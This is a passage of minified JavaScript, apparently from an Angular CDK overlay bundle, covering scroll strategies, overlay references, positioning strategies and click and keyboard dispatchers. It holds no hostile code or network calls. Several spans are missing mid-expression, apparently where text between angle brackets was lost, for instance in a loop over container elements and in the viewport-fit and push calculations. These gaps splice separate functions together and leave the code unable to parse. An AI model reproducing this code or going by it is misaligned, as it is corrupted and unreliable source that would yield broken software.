z_e{constructor(a,e,i,n){this._scrollDispatcher=a,this._viewportRuler=e,this._ngZone=i,this._config=n,this._scrollSubscription=null}attach(a){this._overlayRef=a}enable(){this._scrollSubscription||(this._scrollSubscription=this._scrollDispatcher.scrolled(this._config?this._config.scrollThrottle:0).subscribe(()=>{if(this._overlayRef.updatePosition(),this._config&&this._config.autoClose){const e=this._overlayRef.overlayElement.getBoundingClientRect(),{width:i,height:n}=this._viewportRuler.getViewportSize();e8(e,[{width:i,height:n,bottom:n,right:i,top:0,left:0}])&&(this.disable(),this._ngZone.run(()=>this._overlayRef.detach()))}}))}disable(){this._scrollSubscription&&(this._scrollSubscription.unsubscribe(),this._scrollSubscription=null)}detach(){this.disable(),this._overlayRef=null}}let W_e=(()=>{class t{constructor(e,i,n,r){this._scrollDispatcher=e,this._viewportRuler=i,this._ngZone=n,this.noop=()=>new XW,this.close=c=>new L_e(this._scrollDispatcher,this._ngZone,this._viewportRuler,c),this.block=()=>new N_e(this._viewportRuler,this._document),this.reposition=c=>new z_e(this._scrollDispatcher,this._viewportRuler,this._ngZone,c),this._document=r}}return t.\u0275fac=function(e){return new(e||t)(At(By),At(bm),At(qi),At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();class yg{constructor(a){if(this.scrollStrategy=new XW,this.panelClass="",this.hasBackdrop=!1,this.backdropClass="cdk-overlay-dark-backdrop",this.disposeOnNavigation=!1,a){const e=Object.keys(a);for(const i of e)void 0!==a[i]&&(this[i]=a[i])}}}class F_e{constructor(a,e){this.connectionPair=a,this.scrollableViewProperties=e}}class nb{constructor(a,e,i,n,r,c,d,T,k,q=!1){this._portalOutlet=a,this._host=e,this._pane=i,this._config=n,this._ngZone=r,this._keyboardDispatcher=c,this._document=d,this._location=T,this._outsideClickDispatcher=k,this._animationsDisabled=q,this._backdropElement=null,this._backdropClick=new J,this._attachments=new J,this._detachments=new J,this._locationChanges=I.EMPTY,this._backdropClickHandler=Y=>this._backdropClick.next(Y),this._backdropTransitionendHandler=Y=>{this._disposeBackdrop(Y.target)},this._keydownEvents=new J,this._outsidePointerEvents=new J,n.scrollStrategy&&(this._scrollStrategy=n.scrollStrategy,this._scrollStrategy.attach(this)),this._positionStrategy=n.positionStrategy}get overlayElement(){return this._pane}get backdropElement(){return this._backdropElement}get hostElement(){return this._host}attach(a){!this._host.parentElement&&this._previousHostParent&&this._previousHostParent.appendChild(this._host);const e=this._portalOutlet.attach(a);return this._positionStrategy&&this._positionStrategy.attach(this),this._updateStackingOrder(),this._updateElementSize(),this._updateElementDirection(),this._scrollStrategy&&this._scrollStrategy.enable(),this._ngZone.onStable.pipe(Cn(1)).subscribe(()=>{this.hasAttached()&&this.updatePosition()}),this._togglePointerEvents(!0),this._config.hasBackdrop&&this._attachBackdrop(),this._config.panelClass&&this._toggleClasses(this._pane,this._config.panelClass,!0),this._attachments.next(),this._keyboardDispatcher.add(this),this._config.disposeOnNavigation&&(this._locationChanges=this._location.subscribe(()=>this.dispose())),this._outsideClickDispatcher.add(this),"function"==typeof(null==e?void 0:e.onDestroy)&&e.onDestroy(()=>{this.hasAttached()&&this._ngZone.runOutsideAngular(()=>Promise.resolve().then(()=>this.detach()))}),e}detach(){if(!this.hasAttached())return;this.detachBackdrop(),this._togglePointerEvents(!1),this._positionStrategy&&this._positionStrategy.detach&&this._positionStrategy.detach(),this._scrollStrategy&&this._scrollStrategy.disable();const a=this._portalOutlet.detach();return this._detachments.next(),this._keyboardDispatcher.remove(this),this._detachContentWhenStable(),this._locationChanges.unsubscribe(),this._outsideClickDispatcher.remove(this),a}dispose(){var a;const e=this.hasAttached();this._positionStrategy&&this._positionStrategy.dispose(),this._disposeScrollStrategy(),this._disposeBackdrop(this._backdropElement),this._locationChanges.unsubscribe(),this._keyboardDispatcher.remove(this),this._portalOutlet.dispose(),this._attachments.complete(),this._backdropClick.complete(),this._keydownEvents.complete(),this._outsidePointerEvents.complete(),this._outsideClickDispatcher.remove(this),null===(a=this._host)||void 0===a||a.remove(),this._previousHostParent=this._pane=this._host=null,e&&this._detachments.next(),this._detachments.complete()}hasAttached(){return this._portalOutlet.hasAttached()}backdropClick(){return this._backdropClick}attachments(){return this._attachments}detachments(){return this._detachments}keydownEvents(){return this._keydownEvents}outsidePointerEvents(){return this._outsidePointerEvents}getConfig(){return this._config}updatePosition(){this._positionStrategy&&this._positionStrategy.apply()}updatePositionStrategy(a){a!==this._positionStrategy&&(this._positionStrategy&&this._positionStrategy.dispose(),this._positionStrategy=a,this.hasAttached()&&(a.attach(this),this.updatePosition()))}updateSize(a){this._config=Object.assign(Object.assign({},this._config),a),this._updateElementSize()}setDirection(a){this._config=Object.assign(Object.assign({},this._config),{direction:a}),this._updateElementDirection()}addPanelClass(a){this._pane&&this._toggleClasses(this._pane,a,!0)}removePanelClass(a){this._pane&&this._toggleClasses(this._pane,a,!1)}getDirection(){const a=this._config.direction;return a?"string"==typeof a?a:a.value:"ltr"}updateScrollStrategy(a){a!==this._scrollStrategy&&(this._disposeScrollStrategy(),this._scrollStrategy=a,this.hasAttached()&&(a.attach(this),a.enable()))}_updateElementDirection(){this._host.setAttribute("dir",this.getDirection())}_updateElementSize(){if(!this._pane)return;const a=this._pane.style;a.width=vs(this._config.width),a.height=vs(this._config.height),a.minWidth=vs(this._config.minWidth),a.minHeight=vs(this._config.minHeight),a.maxWidth=vs(this._config.maxWidth),a.maxHeight=vs(this._config.maxHeight)}_togglePointerEvents(a){this._pane.style.pointerEvents=a?"":"none"}_attachBackdrop(){const a="cdk-overlay-backdrop-showing";this._backdropElement=this._document.createElement("div"),this._backdropElement.classList.add("cdk-overlay-backdrop"),this._animationsDisabled&&this._backdropElement.classList.add("cdk-overlay-backdrop-noop-animation"),this._config.backdropClass&&this._toggleClasses(this._backdropElement,this._config.backdropClass,!0),this._host.parentElement.insertBefore(this._backdropElement,this._host),this._backdropElement.addEventListener("click",this._backdropClickHandler),this._animationsDisabled||"undefined"==typeof requestAnimationFrame?this._backdropElement.classList.add(a):this._ngZone.runOutsideAngular(()=>{requestAnimationFrame(()=>{this._backdropElement&&this._backdropElement.classList.add(a)})})}_updateStackingOrder(){this._host.nextSibling&&this._host.parentNode.appendChild(this._host)}detachBackdrop(){const a=this._backdropElement;if(a){if(this._animationsDisabled)return void this._disposeBackdrop(a);a.classList.remove("cdk-overlay-backdrop-showing"),this._ngZone.runOutsideAngular(()=>{a.addEventListener("transitionend",this._backdropTransitionendHandler)}),a.style.pointerEvents="none",this._backdropTimeout=this._ngZone.runOutsideAngular(()=>setTimeout(()=>{this._disposeBackdrop(a)},500))}}_toggleClasses(a,e,i){const n=Oy(e||[]).filter(r=>!!r);n.length&&(i?a.classList.add(...n):a.classList.remove(...n))}_detachContentWhenStable(){this._ngZone.runOutsideAngular(()=>{const a=this._ngZone.onStable.pipe(ea(ra(this._attachments,this._detachments))).subscribe(()=>{(!this._pane||!this._host||0===this._pane.children.length)&&(this._pane&&this._config.panelClass&&this._toggleClasses(this._pane,this._config.panelClass,!1),this._host&&this._host.parentElement&&(this._previousHostParent=this._host.parentElement,this._host.remove()),a.unsubscribe())})})}_disposeScrollStrategy(){const a=this._scrollStrategy;a&&(a.disable(),a.detach&&a.detach())}_disposeBackdrop(a){a&&(a.removeEventListener("click",this._backdropClickHandler),a.removeEventListener("transitionend",this._backdropTransitionendHandler),a.remove(),this._backdropElement===a&&(this._backdropElement=null)),this._backdropTimeout&&(clearTimeout(this._backdropTimeout),this._backdropTimeout=void 0)}}let ob=(()=>{class t{constructor(e,i){this._platform=i,this._document=e}ngOnDestroy(){var e;null===(e=this._containerElement)||void 0===e||e.remove()}getContainerElement(){return this._containerElement||this._createContainer(),this._containerElement}_createContainer(){const e="cdk-overlay-container";if(this._platform.isBrowser||rw()){const n=this._document.querySelectorAll(`.${e}[platform="server"], .${e}[platform="test"]`);for(let r=0;r{this._isInitialRender=!0,this.apply()})}apply(){if(this._isDisposed||!this._platform.isBrowser)return;if(!this._isInitialRender&&this._positionLocked&&this._lastPosition)return void this.reapplyLastPosition();this._clearPanelClasses(),this._resetOverlayElementStyles(),this._resetBoundingBoxStyles(),this._viewportRect=this._getNarrowedViewportRect(),this._originRect=this._getOriginRect(),this._overlayRect=this._pane.getBoundingClientRect(),this._containerRect=this._overlayContainer.getContainerElement().getBoundingClientRect();const a=this._originRect,e=this._overlayRect,i=this._viewportRect,n=this._containerRect,r=[];let c;for(let d of this._preferredPositions){let T=this._getOriginPoint(a,n,d),k=this._getOverlayPoint(T,e,d),q=this._getOverlayFit(k,e,i,d);if(q.isCompletelyWithinViewport)return this._isPushed=!1,void this._applyPosition(d,T);this._canFitWithFlexibleDimensions(q,k,i)?r.push({position:d,origin:T,overlayRect:e,boundingBoxRect:this._calculateBoundingBoxRect(T,d)}):(!c||c.overlayFit.visibleAreaT&&(T=q,d=k)}return this._isPushed=!1,void this._applyPosition(d.position,d.origin)}if(this._canPush)return this._isPushed=!0,void this._applyPosition(c.position,c.originPoint);this._applyPosition(c.position,c.originPoint)}detach(){this._clearPanelClasses(),this._lastPosition=null,this._previousPushAmount=null,this._resizeSubscription.unsubscribe()}dispose(){this._isDisposed||(this._boundingBox&&bg(this._boundingBox.style,{top:"",left:"",right:"",bottom:"",height:"",width:"",alignItems:"",justifyContent:""}),this._pane&&this._resetOverlayElementStyles(),this._overlayRef&&this._overlayRef.hostElement.classList.remove(JW),this.detach(),this._positionChanges.complete(),this._overlayRef=this._boundingBox=null,this._isDisposed=!0)}reapplyLastPosition(){if(this._isDisposed||!this._platform.isBrowser)return;const a=this._lastPosition;if(a){this._originRect=this._getOriginRect(),this._overlayRect=this._pane.getBoundingClientRect(),this._viewportRect=this._getNarrowedViewportRect(),this._containerRect=this._overlayContainer.getContainerElement().getBoundingClientRect();const e=this._getOriginPoint(this._originRect,this._containerRect,a);this._applyPosition(a,e)}else this.apply()}withScrollableContainers(a){return this._scrollables=a,this}withPositions(a){return this._preferredPositions=a,-1===a.indexOf(this._lastPosition)&&(this._lastPosition=null),this._validatePositions(),this}withViewportMargin(a){return this._viewportMargin=a,this}withFlexibleDimensions(a=!0){return this._hasFlexibleDimensions=a,this}withGrowAfterOpen(a=!0){return this._growAfterOpen=a,this}withPush(a=!0){return this._canPush=a,this}withLockedPosition(a=!0){return this._positionLocked=a,this}setOrigin(a){return this._origin=a,this}withDefaultOffsetX(a){return this._offsetX=a,this}withDefaultOffsetY(a){return this._offsetY=a,this}withTransformOriginOn(a){return this._transformOriginSelector=a,this}_getOriginPoint(a,e,i){let n,r;if("center"==i.originX)n=a.left+a.width/2;else{const c=this._isRtl()?a.right:a.left,d=this._isRtl()?a.left:a.right;n="start"==i.originX?c:d}return e.left<0&&(n-=e.left),r="center"==i.originY?a.top+a.height/2:"top"==i.originY?a.top:a.bottom,e.top<0&&(r-=e.top),{x:n,y:r}}_getOverlayPoint(a,e,i){let n,r;return n="center"==i.overlayX?-e.width/2:"start"===i.overlayX?this._isRtl()?-e.width:0:this._isRtl()?0:-e.width,r="center"==i.overlayY?-e.height/2:"top"==i.overlayY?0:-e.height,{x:a.x+n,y:a.y+r}}_getOverlayFit(a,e,i,n){const r=eF(e);let{x:c,y:d}=a,T=this._getOffset(n,"x"),k=this._getOffset(n,"y");T&&(c+=T),k&&(d+=k);let te=0-d,pe=d+r.height-i.height,Re=this._subtractOverflows(r.width,0-c,c+r.width-i.width),Fe=this._subtractOverflows(r.height,te,pe),Ne=Re*Fe;return{visibleArea:Ne,isCompletelyWithinViewport:r.width*r.height===Ne,fitsInViewportVertically:Fe===r.height,fitsInViewportHorizontally:Re==r.width}}_canFitWithFlexibleDimensions(a,e,i){if(this._hasFlexibleDimensions){const n=i.bottom-e.y,r=i.right-e.x,c=ZW(this._overlayRef.getConfig().minHeight),d=ZW(this._overlayRef.getConfig().minWidth),k=a.fitsInViewportHorizontally||null!=d&&d<=r;return(a.fitsInViewportVertically||null!=c&&c<=n)&&k}return!1}_pushOverlayOnScreen(a,e,i){if(this._previousPushAmount&&this._positionLocked)return{x:a.x+this._previousPushAmount.x,y:a.y+this._previousPushAmount.y};const n=eF(e),r=this._viewportRect,c=Math.max(a.x+n.width-r.width,0),d=Math.max(a.y+n.height-r.height,0),T=Math.max(r.top-i.top-a.y,0),k=Math.max(r.left-i.left-a.x,0);let q=0,Y=0;return q=n.width<=r.width?k||-c:a.xRe&&!this._isInitialRender&&!this._growAfterOpen&&(c=a.y-Re/2)}if("end"===e.overlayX&&!n||"start"===e.overlayX&&n)te=i.width-a.x+this._viewportMargin,q=a.x-this._viewportMargin;else if("start"===e.overlayX&&!n||"end"===e.overlayX&&n)Y=a.x,q=i.right-a.x;else{const pe=Math.min(i.right-a.x+i.left,a.x),Re=this._lastBoundingBoxSize.width;q=2*pe,Y=a.x-pe,q>Re&&!this._isInitialRender&&!this._growAfterOpen&&(Y=a.x-Re/2)}return{top:c,left:Y,bottom:d,right:te,width:q,height:r}}_setBoundingBoxStyles(a,e){const i=this._calculateBoundingBoxRect(a,e);!this._isInitialRender&&!this._growAfterOpen&&(i.height=Math.min(i.height,this._lastBoundingBoxSize.height),i.width=Math.min(i.width,this._lastBoundingBoxSize.width));const n={};if(this._hasExactPosition())n.top=n.left="0",n.bottom=n.right=n.maxHeight=n.maxWidth="",n.width=n.height="100%";else{const r=this._overlayRef.getConfig().maxHeight,c=this._overlayRef.getConfig().maxWidth;n.height=vs(i.height),n.top=vs(i.top),n.bottom=vs(i.bottom),n.width=vs(i.width),n.left=vs(i.left),n.right=vs(i.right),n.alignItems="center"===e.overlayX?"center":"end"===e.overlayX?"flex-end":"flex-start",n.justifyContent="center"===e.overlayY?"center":"bottom"===e.overlayY?"flex-end":"flex-start",r&&(n.maxHeight=vs(r)),c&&(n.maxWidth=vs(c))}this._lastBoundingBoxSize=i,bg(this._boundingBox.style,n)}_resetBoundingBoxStyles(){bg(this._boundingBox.style,{top:"0",left:"0",right:"0",bottom:"0",height:"",width:"",alignItems:"",justifyContent:""})}_resetOverlayElementStyles(){bg(this._pane.style,{top:"",left:"",bottom:"",right:"",position:"",transform:""})}_setOverlayElementStyles(a,e){const i={},n=this._hasExactPosition(),r=this._hasFlexibleDimensions,c=this._overlayRef.getConfig();if(n){const q=this._viewportRuler.getViewportScrollPosition();bg(i,this._getExactOverlayY(e,a,q)),bg(i,this._getExactOverlayX(e,a,q))}else i.position="static";let d="",T=this._getOffset(e,"x"),k=this._getOffset(e,"y");T&&(d+=`translateX(${T}px) `),k&&(d+=`translateY(${k}px)`),i.transform=d.trim(),c.maxHeight&&(n?i.maxHeight=vs(c.maxHeight):r&&(i.maxHeight="")),c.maxWidth&&(n?i.maxWidth=vs(c.maxWidth):r&&(i.maxWidth="")),bg(this._pane.style,i)}_getExactOverlayY(a,e,i){let n={top:"",bottom:""},r=this._getOverlayPoint(e,this._overlayRect,a);return this._isPushed&&(r=this._pushOverlayOnScreen(r,this._overlayRect,i)),"bottom"===a.overlayY?n.bottom=this._document.documentElement.clientHeight-(r.y+this._overlayRect.height)+"px":n.top=vs(r.y),n}_getExactOverlayX(a,e,i){let c,n={left:"",right:""},r=this._getOverlayPoint(e,this._overlayRect,a);return this._isPushed&&(r=this._pushOverlayOnScreen(r,this._overlayRect,i)),c=this._isRtl()?"end"===a.overlayX?"left":"right":"end"===a.overlayX?"right":"left","right"===c?n.right=this._document.documentElement.clientWidth-(r.x+this._overlayRect.width)+"px":n.left=vs(r.x),n}_getScrollVisibility(){const a=this._getOriginRect(),e=this._pane.getBoundingClientRect(),i=this._scrollables.map(n=>n.getElementRef().nativeElement.getBoundingClientRect());return{isOriginClipped:YW(a,i),isOriginOutsideView:e8(a,i),isOverlayClipped:YW(e,i),isOverlayOutsideView:e8(e,i)}}_subtractOverflows(a,...e){return e.reduce((i,n)=>i-Math.max(n,0),a)}_getNarrowedViewportRect(){const a=this._document.documentElement.clientWidth,e=this._document.documentElement.clientHeight,i=this._viewportRuler.getViewportScrollPosition();return{top:i.top+this._viewportMargin,left:i.left+this._viewportMargin,right:i.left+a-this._viewportMargin,bottom:i.top+e-this._viewportMargin,width:a-2*this._viewportMargin,height:e-2*this._viewportMargin}}_isRtl(){return"rtl"===this._overlayRef.getDirection()}_hasExactPosition(){return!this._hasFlexibleDimensions||this._isPushed}_getOffset(a,e){return"x"===e?null==a.offsetX?this._offsetX:a.offsetX:null==a.offsetY?this._offsetY:a.offsetY}_validatePositions(){}_addPanelClasses(a){this._pane&&Oy(a).forEach(e=>{""!==e&&-1===this._appliedPanelClasses.indexOf(e)&&(this._appliedPanelClasses.push(e),this._pane.classList.add(e))})}_clearPanelClasses(){this._pane&&(this._appliedPanelClasses.forEach(a=>{this._pane.classList.remove(a)}),this._appliedPanelClasses=[])}_getOriginRect(){const a=this._origin;if(a instanceof mi)return a.nativeElement.getBoundingClientRect();if(a instanceof Element)return a.getBoundingClientRect();const e=a.width||0,i=a.height||0;return{top:a.y,bottom:a.y+i,left:a.x,right:a.x+e,height:i,width:e}}}function bg(t,a){for(let e in a)a.hasOwnProperty(e)&&(t[e]=a[e]);return t}function ZW(t){if("number"!=typeof t&&null!=t){const[a,e]=t.split(V_e);return e&&"px"!==e?null:parseFloat(a)}return t||null}function eF(t){return{top:Math.floor(t.top),right:Math.floor(t.right),bottom:Math.floor(t.bottom),left:Math.floor(t.left),width:Math.floor(t.width),height:Math.floor(t.height)}}const tF="cdk-global-overlay-wrapper";class H_e{constructor(){this._cssPosition="static",this._topOffset="",this._bottomOffset="",this._alignItems="",this._xPosition="",this._xOffset="",this._width="",this._height="",this._isDisposed=!1}attach(a){const e=a.getConfig();this._overlayRef=a,this._width&&!e.width&&a.updateSize({width:this._width}),this._height&&!e.height&&a.updateSize({height:this._height}),a.hostElement.classList.add(tF),this._isDisposed=!1}top(a=""){return this._bottomOffset="",this._topOffset=a,this._alignItems="flex-start",this}left(a=""){return this._xOffset=a,this._xPosition="left",this}bottom(a=""){return this._topOffset="",this._bottomOffset=a,this._alignItems="flex-end",this}right(a=""){return this._xOffset=a,this._xPosition="right",this}start(a=""){return this._xOffset=a,this._xPosition="start",this}end(a=""){return this._xOffset=a,this._xPosition="end",this}width(a=""){return this._overlayRef?this._overlayRef.updateSize({width:a}):this._width=a,this}height(a=""){return this._overlayRef?this._overlayRef.updateSize({height:a}):this._height=a,this}centerHorizontally(a=""){return this.left(a),this._xPosition="center",this}centerVertically(a=""){return this.top(a),this._alignItems="center",this}apply(){if(!this._overlayRef||!this._overlayRef.hasAttached())return;const a=this._overlayRef.overlayElement.style,e=this._overlayRef.hostElement.style,i=this._overlayRef.getConfig(),{width:n,height:r,maxWidth:c,maxHeight:d}=i,T=!("100%"!==n&&"100vw"!==n||c&&"100%"!==c&&"100vw"!==c),k=!("100%"!==r&&"100vh"!==r||d&&"100%"!==d&&"100vh"!==d),q=this._xPosition,Y=this._xOffset,te="rtl"===this._overlayRef.getConfig().direction;let pe="",Re="",Fe="";T?Fe="flex-start":"center"===q?(Fe="center",te?Re=Y:pe=Y):te?"left"===q||"end"===q?(Fe="flex-end",pe=Y):("right"===q||"start"===q)&&(Fe="flex-start",Re=Y):"left"===q||"start"===q?(Fe="flex-start",pe=Y):("right"===q||"end"===q)&&(Fe="flex-end",Re=Y),a.position=this._cssPosition,a.marginLeft=T?"0":pe,a.marginTop=k?"0":this._topOffset,a.marginBottom=this._bottomOffset,a.marginRight=T?"0":Re,e.justifyContent=Fe,e.alignItems=k?"flex-start":this._alignItems}dispose(){if(this._isDisposed||!this._overlayRef)return;const a=this._overlayRef.overlayElement.style,e=this._overlayRef.hostElement,i=e.style;e.classList.remove(tF),i.justifyContent=i.alignItems=a.marginTop=a.marginBottom=a.marginLeft=a.marginRight=a.position="",this._overlayRef=null,this._isDisposed=!0}}let U_e=(()=>{class t{constructor(e,i,n,r){this._viewportRuler=e,this._document=i,this._platform=n,this._overlayContainer=r}global(){return new H_e}flexibleConnectedTo(e){return new B_e(e,this._viewportRuler,this._document,this._platform,this._overlayContainer)}}return t.\u0275fac=function(e){return new(e||t)(At(bm),At(ga),At(cr),At(ob))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),iF=(()=>{class t{constructor(e){this._attachedOverlays=[],this._document=e}ngOnDestroy(){this.detach()}add(e){this.remove(e),this._attachedOverlays.push(e)}remove(e){const i=this._attachedOverlays.indexOf(e);i>-1&&this._attachedOverlays.splice(i,1),0===this._attachedOverlays.length&&this.detach()}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),q_e=(()=>{class t extends iF{constructor(e,i){super(e),this._ngZone=i,this._keydownListener=n=>{const r=this._attachedOverlays;for(let c=r.length-1;c>-1;c--)if(r[c]._keydownEvents.observers.length>0){const d=r[c]._keydownEvents;this._ngZone?this._ngZone.run(()=>d.next(n)):d.next(n);break}}}add(e){super.add(e),this._isAttached||(this._ngZone?this._ngZone.runOutsideAngular(()=>this._document.body.addEventListener("keydown",this._keydownListener)):this._document.body.addEventListener("keydown",this._keydownListener),this._isAttached=!0)}detach(){this._isAttached&&(this._document.body.removeEventListener("keydown",this._keydownListener),this._isAttached=!1)}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(qi,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),G_e=(()=>{class t extends iF{constructor(e,i,n){super(e),this._platform=i,this._ngZone=n,this._cursorStyleIsSet=!1,this._pointerDownListener=r=>{this._pointerDownEventTarget=Id(r)},this._clickListener=r=>{const c=Id(r),d="click"===r.type&&this._pointerDownEventTarget?this._pointerDownEventTarget:c;this._pointerDownEventTarget=null;const T=this._attachedOverlays.slice();for(let k=T.length-1;k>-1;k--){const q=T[k];if(q._outsidePointerEvents.observers.length<1||!q.hasAttached())continue;if(q.overlayElement.contains(c)||q.overlayElement.contains(d))break;const Y=q._outsidePointerEvents;this._ngZone?this._ngZone.run(()=>Y.next(r)):Y.next(r)}}}add(e){if(super.add(e),!this._isAttached){const i=this._document.body;this._ngZone?this._ngZone.runOutsideAngular(()=>this._addEventListeners(i)):this._addEventListeners(i),this._platform.IOS&&!this._cursorStyleIsSet&&(this._cursorOriginalValue=i.style.cursor,i.style.cursor="pointer",this._cursorStyleIsSet=!0),this._isAttached=!0}}detach(){if(this._isAttached){const e=this._document.body;e.removeEventListener("pointerdown",this._pointerDownListener,!0),e.removeEventListener("click",this._clickListener,!0),e.removeEventListener("auxclick",this._clickListener,!0),e.removeEventListener("contextmenu",this._clickListener,!0),this._platform.IOS&&this._cursorStyleIsSet&&(e.style.cursor=this._cursorOriginalValue,this._cursorStyleIsSet=!1),this._isAttached=!1}}_addEventListeners(e){e.addEventListener("pointerdown",this._pointerDownListener,!0),e.addEventListener("click",this._clickListener,!0),e.addEventListener("auxclick",this._clickListener,!0),e.addEventListener("contextmenu",this._clickListener,!0)}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(cr),At(qi,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),j_e=0,As=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe){this.scrollStrategies=e,this._overlayContainer=i,this._componentFactoryResolver=n,this._positionBuilder=r,this._keyboardDispatcher=c,this._injector=d,this._ngZone=T,this._document=k,this._directionality=q,this._location=Y,this._outsideClickDispatcher=te,this._animationsModuleType=pe}create(e){const i=this._createHostElement(),n=this._createPaneElement(i),r=this._createPortalOutlet(n),c=new yg(e);return c.direction=c.direction||this._directionality.value,new nb(r,i,n,c,this._ngZone,this._keyboardDispatcher,this._document,this._location,this._outsideClickDispatcher,"NoopAnimations"===this._animationsModuleType)}position(){return this._positionBuilder}_createPaneElement(e){const i=this._document.createElement("div");return i.id="cdk-overlay-"+j_e++,i.classList.add("cdk-overlay-pane"),e.appendChild(i),i}_createHostElement(){const e=this._document.createElement("div");return this._overlayContainer.getContainerElement().appendChild(e),e}_createPortalOutlet(e){return this._appRef||(this._appRef=this._injector.get(Yf)),new Zw(e,this._componentFactoryResolver,this._appRef,this._injector,this._document)}}return t.\u0275fac=function(e){return new(e||t)(At(W_e),At(ob),At(On),At(U_e),At(q_e),At(Ko),At(qi),At(ga),At(Cr),At(iy),At(G_e),At(ar,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const Q_e=[{originX:"start",originY:"bottom",overlayX:"start",overlayY:"top"},{originX:"start",originY:"top",overlayX:"start",overlayY:"bottom"},{originX:"end",originY:"top",overlayX:"end",overlayY:"bottom"},{originX:"end",originY:"bottom",overlayX:"end",overlayY:"top"}],aF=new ni("cdk-connected-overlay-scroll-strategy");let t8=(()=>{class t{constructor(e){this.elementRef=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","cdk-overlay-origin",""],["","overlay-origin",""],["","cdkOverlayOrigin",""]],exportAs:["cdkOverlayOrigin"]}),t})(),i8=(()=>{class t{constructor(e,i,n,r,c){this._overlay=e,this._dir=c,this._hasBackdrop=!1,this._lockPosition=!1,this._growAfterOpen=!1,this._flexibleDimensions=!1,this._push=!1,this._backdropSubscription=I.EMPTY,this._attachSubscription=I.EMPTY,this._detachSubscription=I.EMPTY,this._positionSubscription=I.EMPTY,this.viewportMargin=0,this.open=!1,this.disableClose=!1,this.backdropClick=new Tt,this.positionChange=new Tt,this.attach=new Tt,this.detach=new Tt,this.overlayKeydown=new Tt,this.overlayOutsideClick=new Tt,this._templatePortal=new Mm(i,n),this._scrollStrategyFactory=r,this.scrollStrategy=this._scrollStrategyFactory()}get offsetX(){return this._offsetX}set offsetX(e){this._offsetX=e,this._position&&this._updatePositionStrategy(this._position)}get offsetY(){return this._offsetY}set offsetY(e){this._offsetY=e,this._position&&this._updatePositionStrategy(this._position)}get hasBackdrop(){return this._hasBackdrop}set hasBackdrop(e){this._hasBackdrop=wi(e)}get lockPosition(){return this._lockPosition}set lockPosition(e){this._lockPosition=wi(e)}get flexibleDimensions(){return this._flexibleDimensions}set flexibleDimensions(e){this._flexibleDimensions=wi(e)}get growAfterOpen(){return this._growAfterOpen}set growAfterOpen(e){this._growAfterOpen=wi(e)}get push(){return this._push}set push(e){this._push=wi(e)}get overlayRef(){return this._overlayRef}get dir(){return this._dir?this._dir.value:"ltr"}ngOnDestroy(){this._attachSubscription.unsubscribe(),this._detachSubscription.unsubscribe(),this._backdropSubscription.unsubscribe(),this._positionSubscription.unsubscribe(),this._overlayRef&&this._overlayRef.dispose()}ngOnChanges(e){this._position&&(this._updatePositionStrategy(this._position),this._overlayRef.updateSize({width:this.width,minWidth:this.minWidth,height:this.height,minHeight:this.minHeight}),e.origin&&this.open&&this._position.apply()),e.open&&(this.open?this._attachOverlay():this._detachOverlay())}_createOverlay(){(!this.positions||!this.positions.length)&&(this.positions=Q_e);const e=this._overlayRef=this._overlay.create(this._buildConfig());this._attachSubscription=e.attachments().subscribe(()=>this.attach.emit()),this._detachSubscription=e.detachments().subscribe(()=>this.detach.emit()),e.keydownEvents().subscribe(i=>{this.overlayKeydown.next(i),27===i.keyCode&&!this.disableClose&&!es(i)&&(i.preventDefault(),this._detachOverlay())}),this._overlayRef.outsidePointerEvents().subscribe(i=>{this.overlayOutsideClick.next(i)})}_buildConfig(){const e=this._position=this.positionStrategy||this._createPositionStrategy(),i=new yg({direction:this._dir,positionStrategy:e,scrollStrategy:this.scrollStrategy,hasBackdrop:this.hasBackdrop});return(this.width||0===this.width)&&(i.width=this.width),(this.height||0===this.height)&&(i.height=this.height),(this.minWidth||0===this.minWidth)&&(i.minWidth=this.minWidth),(this.minHeight||0===this.minHeight)&&(i.minHeight=this.minHeight),this.backdropClass&&(i.backdropClass=this.backdropClass),this.panelClass&&(i.panelClass=this.panelClass),i}_updatePositionStrategy(e){const i=this.positions.map(n=>({originX:n.originX,originY:n.originY,overlayX:n.overlayX,overlayY:n.overlayY,offsetX:n.offsetX||this.offsetX,offsetY:n.offsetY||this.offsetY,panelClass:n.panelClass||void 0}));return e.setOrigin(this._getFlexibleConnectedPositionStrategyOrigin()).withPositions(i).withFlexibleDimensions(this.flexibleDimensions).withPush(this.push).withGrowAfterOpen(this.growAfterOpen).withViewportMargin(this.viewportMargin).withLockedPosition(this.lockPosition).withTransformOriginOn(this.transformOriginSelector)}_createPositionStrategy(){const e=this._overlay.position().flexibleConnectedTo(this._getFlexibleConnectedPositionStrategyOrigin());return this._updatePositionStrategy(e),e}_getFlexibleConnectedPositionStrategyOrigin(){return this.origin instanceof t8?this.origin.elementRef:this.origin}_attachOverlay(){this._overlayRef?this._overlayRef.getConfig().hasBackdrop=this.hasBackdrop:this._createOverlay(),this._overlayRef.hasAttached()||this._overlayRef.attach(this._templatePortal),this.hasBackdrop?this._backdropSubscription=this._overlayRef.backdropClick().subscribe(e=>{this.backdropClick.emit(e)}):this._backdropSubscription.unsubscribe(),this._positionSubscription.unsubscribe(),this.positionChange.observers.length>0&&(this._positionSubscription=this._position.positionChanges.pipe(eL(()=>this.positionChange.observers.length>0)).subscribe(e=>{this.positionChange.emit(e),0===this.positionChange.observers.length&&this._positionSubscription.unsubscribe()}))}_detachOverlay(){this._overlayRef&&this._overlayRef.detach(),this._backdropSubscription.unsubscribe(),this._positionSubscription.unsubscribe()}}return t.\u0275fac=function(e){return 